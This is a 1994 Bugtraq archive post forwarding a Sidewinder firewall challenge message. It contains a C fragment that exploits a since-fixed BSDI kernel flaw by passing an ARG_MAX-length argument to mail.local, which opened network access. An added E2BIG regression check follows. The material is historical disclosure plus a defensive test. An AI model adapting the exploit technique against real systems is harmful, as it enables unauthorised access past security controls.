Bugtraq mailing list archives
Yesterday this would have worked... (fwd)
From: matt () worldlinx com (Matthew Harding)
Date: Fri, 16 Dec 1994 14:12:51 -0500 (EST)
Oops, I posted the previous message to bugtraq not realizing that SCTC originally sent the message to the sneakers list. Here is the original message, posted with permission; 10 points to anyone who can spot the supposed flaw in the BSDI O/S with this.

BTW, anyone care to comment if this should be replicable across platforms?

Cheers,
Matthew (matt () worldlinx com)

Forwarded message:
From owner-sneakers () CS YALE EDU Wed Dec 14 15:07:45 1994
Message-Id: <199412141927.NAA06239 () spirit sctc com>
Date: 14 Dec 1994 13:35:25 -0600
From: Glenn Andreas <andreas () sctc com>
Subject: Yesterday this would have worked...
To: "sneakers () CS YALE EDU" <sneakers () CS YALE EDU>
X-Mailer: Mail*Link PT/Internet 1.0.1
Sender: owner-sneakers () CS YALE EDU
Precedence: bulk

For those of you who think that the Sidewinder challenge was impossible, the following code fragment would have allowed you to get at the internal net and win a jacket. This, of course, was yesterday (and the kernel has since been fixed).

You just would have had to add this fragment at the beginning of your favorite telnet client code (or whatever you wanted to use to get at the other side of the network), and suddenly all your socket, bind, etc... calls would succeed.

As for exactly how this fragment worked, that would be telling... (but suffice it to say that this approach won't help when we go to 4.4, but probably not for the obvious reasons).

    #include <unistd.h>
    #include <sys/param.h>
    #include <stdlib.h>     /* malloc */
    #include <string.h>     /* memset */
    /* .... */
    int main(argc, argv, envp)
    int argc;
    char **argv, **envp;
    {
        char *argv1[2];

        /* build our new argv: one ARG_MAX-byte string of 'x' plus its NUL */
        argv1[0] = malloc(ARG_MAX+1);
        memset(argv1[0],'x',ARG_MAX);
        argv1[0][ARG_MAX] = 0;
        argv1[1] = NULL;

        /* exercise the bug... */
        execve("/usr/libexec/mail.local",argv1,envp);

        /* and at this point we can get at the net... */
        /* [ insert your favorite telnet client code here.... ] */
    }

---
"You think that's funny? I'll show you funny..."
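The fragment above depends on execve accepting an argument string longer than ARG_MAX. The following is an added regression check, written for this archive page and not code from either poster, that a kernel enforces that bound: a forked child execs a harmless target (/bin/sh, an assumption; no privileged binary is involved) with a single over-length argv string and reports the errno, which should be E2BIG. The function name is mine.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef ARG_MAX
#define ARG_MAX 131072   /* fallback when <limits.h> leaves it undefined */
#endif
/* Run execve(path) with one argv string a byte over the ARG_MAX bound.
 * The attempt runs in a forked child so the caller survives either way.
 * Returns execve's errno (E2BIG is correct), 0 if the exec unexpectedly
 * went through, or -1 if the check itself could not be carried out. */
int oversized_argv_result(const char *path)
{
    long lim = sysconf(_SC_ARG_MAX);   /* runtime bound; may exceed the macro */
    if (lim < ARG_MAX)
        lim = ARG_MAX;
    char *big = malloc((size_t)lim + 2);
    if (big == NULL)
        return -1;
    memset(big, 'x', (size_t)lim + 1); /* lim+1 bytes of payload, then NUL */
    big[lim + 1] = '\0';
    char *argv1[] = { big, NULL };
    char *envp[] = { NULL };
    pid_t pid = fork();
    if (pid < 0) {
        free(big);
        return -1;
    }
    if (pid == 0) {
        execve(path, argv1, envp);     /* must fail: argv exceeds the limit */
        _exit(errno & 0xff);           /* hand the errno back to the parent */
    }
    free(big);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    int err = oversized_argv_result("/bin/sh");
    printf("execve with oversized argv: %s\n", err == E2BIG ? "rejected with E2BIG (expected)" : "NOT rejected, or check failed");
    return err == E2BIG ? 0 : 1;
}
```

A return value of 0 means the kernel let the exec through, which is exactly the class of laxity the message describes.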